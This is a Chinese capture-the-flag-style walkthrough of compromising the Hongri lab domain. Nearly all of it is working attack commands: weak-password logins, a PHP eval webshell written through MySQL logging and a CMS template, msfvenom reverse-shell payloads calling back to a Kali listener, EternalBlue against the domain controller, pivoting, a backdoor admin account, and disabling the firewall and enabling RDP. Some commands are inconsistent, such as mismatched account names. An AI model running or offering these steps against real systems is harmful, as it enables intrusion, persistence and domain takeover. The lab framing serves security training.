一、环境搭建
1.红日靶场下载:
靶场下载地址:
https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
提取码:n1u2
2.内外网IP搭建
| Windows 7 x64 | Windows Server 2008 | Win2K3 Metasploitable | kali |
|---|---|---|---|
| 内网IP:192.168.52.143 | 192.168.52.138 | 192.168.52.141 | |
| 外网IP:192.168.27.129 | 192.168.27.128 |
一、Windows 7 x64
需要设置两个网络适配器:
1.NAT模式
2.桥接模式
桥接模式设置:
二、Windows Server 2008
三、Win2K3 Metasploitable
3.检测内外网的网络正常
Windows 7 x64
与外网互通正常
与内网的两台主机网络互通
Windows Server 2008
因为win 7开启了防火墙,所以是无法ping通 的
Win2K3 Metasploitable
最后在 Win7 外网服务器主机的 C 盘找到 PhpStudy 启动 Web 服务
二、web渗透
1.信息收集
御剑扫描
扫描发现开启了3306、80、110端口
访问80端口的web页面
账号密码都是弱口令root
扫描目录,发现/phpmyadmin/目录
访问/phpmyadmin/目录
然后利用root root登录
2.日志导出getshell
general_log和general_log_file简述:
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,
以原始的状态来显示,
如果将general_log开关打开,general_log_file指定一个php文件,
则查询的操作将会全部写入到general_log_file指定的文件,
可以通过访问general_log_file指定的文件来获取webshell
show variables like 'general%'; #查看
set global general_log = "ON"; #开启ON
set global general_log_file="C:/phpStudy/www/shell.php" #绝对路径C:/phpStudy/www
select '<?php @eval($_POST[cmd]);?>';
3.yxcms
在phpmyadmin数据库中,看到了newyxcms数据库,猜测下这个是不是有个这个目录
/yxcms/目录
有个公告信息:
本站为YXcms的默认演示模板,YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。
后台地址请在网址后面加上/index.php?r=admin进入。
后台的用户名:admin;密码:123456,请进入后修改默认密码。
登录后台
账号:admin
密码:123456
@eval($_POST[cmd]);
#模板路径
protected/apps/default/view/default/info.php
连接蚁剑
4.msf
msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
Module options (payload/windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o 64.exe
[*] Writing 7168 bytes to 64.exe...
需要先生成64.exe,然后才可以使用下面的命令生成payload
##payload 生成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.27.128 LPORT=5555 -f exe -o r.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.103.129 LPORT=5555 -f exe -o 32.exe
把生成的64.exe传入蚁剑中C:/盘
kali监听
msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.82 LPORT=5555 -f exe -o 64.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
run
kali监听成功
三、内网信息收集
1.信息收集
c:\>net config workstation #网络配置的信息
c:\>chcp 65001 #改编码信息
ipconfig /all 查看本机ip,所在域**
route print 打印路由信息**
net view 查看局域网内其他主机名**
arp -a 查看arp缓存
whoami
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:"" 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名" 建立c盘共享
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件
net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户**
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域**
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group "domain admins" /domain 查看域管理员的名字
net group "domain computers" /domain 查看域中的其他主机名
net group "doamin controllers" /domain 查看域控制器(可能有多台)
四、内网横向渗透
1.信息收集
获得系统信息:sysinfo
进入shell,net view查看域内的其他机子:
定位域控:net group “domain controllers” /domain
OWA
定位域管:net group “domain admins” /domain
Ping域名获真实ip:
OWA.god.org对应:192.168.52.138
2.内网静态路由配置
MSF 的 autoroute模块是 MSF 框架中自带的一个路由转发功能,实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由。
首先需要使用配置静态路由:
#加载MSF的autoroute模块,获取当前机器的所有网段信息
run post/multi/manage/autoroute
#添加目标内网路由
run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD
添加失败,因为该路由已存在
3.MSF内网端口扫描
现在路由可达内网网段,可以先对内网主机进行探测。 1、先执行background 命令将当前执行的 Meterpreter 会话切换到后台(后续也可执行sessions -i 重新返回会话),然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.141 开放的端口:
我这里优先扫80 445(MS17-010) 3389(MS19-0708)
background
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389
run
发现开启了445端口
2、同样的方法,发现域控主机192.168.52.138也开启了 445 端口:
set rhosts 192.168.52.138
set ports 80,135-139,445,3306,3389
run
4.利用ms17-010进行攻击
1、对于开启了 445 端口的 Windows 服务器,借助 MSF 自带的漏洞扫描模块进行扫描:
search ms17_010 #搜索MSF集成的与ms17_010漏洞相关的模块
use auxiliary/scanner/smb/smb_ms17_010 # 加载扫描exp
set rhosts 192.168.52.141 #设置被扫描的主机IP
run
可以看到内网其他两台主机都是存在ms17-010漏洞的
2、尝试利用永恒之蓝漏洞拿下域控主机192.168.52.138,使用 MSF 集成的 ms17-010 漏洞 EXP:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
set command whoami
run
成功执行,但是shell反弹失败。
可以尝试psexec。但是也可能会不能成功。
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run
5.MSF开启远程桌面
sessions -l
sessions -l 通常用于列出当前与远程系统建立的会话(sessions)。
这种命令通常是在Metasploit Framework(MSF)等工具中使用的
已经在 MSF 中获得 Win7 的 Shell,故只需要返回会话并执行命令
run post/windows/manage/enable_rdp
是 Metasploit Framework(MSF)中的一个后渗透模块命令。
这个特定的模块旨在用于管理 Windows 系统的后渗透,并用于在被攻陷的 Windows 机器上启用远程桌面协议(RDP)。
6.win7开启3389
先回到win7界面
获得服务器 Shell 后开启远程桌面的方法,除了借助 MSF,在常规渗透过程也可以在 CMD 命令中实现:
#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 添加账户密码
net user wsm Pass!@123456 /add
# 给账户添加为管理员权限
net localgroup administrators Tr0e /add
#查询是否成功添加用户
net user wsm
#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389
7.域控主机141开启远程桌面连接
#msf 设置全局代理
setg Proxies socks5:127.0.0.1:8989
setg ReverseAllowProxy true
##通过代理连接远程桌面
proxychains rdesktop 192.168.52.141 -p hongrisec@2022 -u administrator
8.拿下域管主机138
同理再拿下域管主机
注意!域管主机连不上的话需要关闭防火墙!!!
##关闭防火墙:
netsh firewall set opmode disable
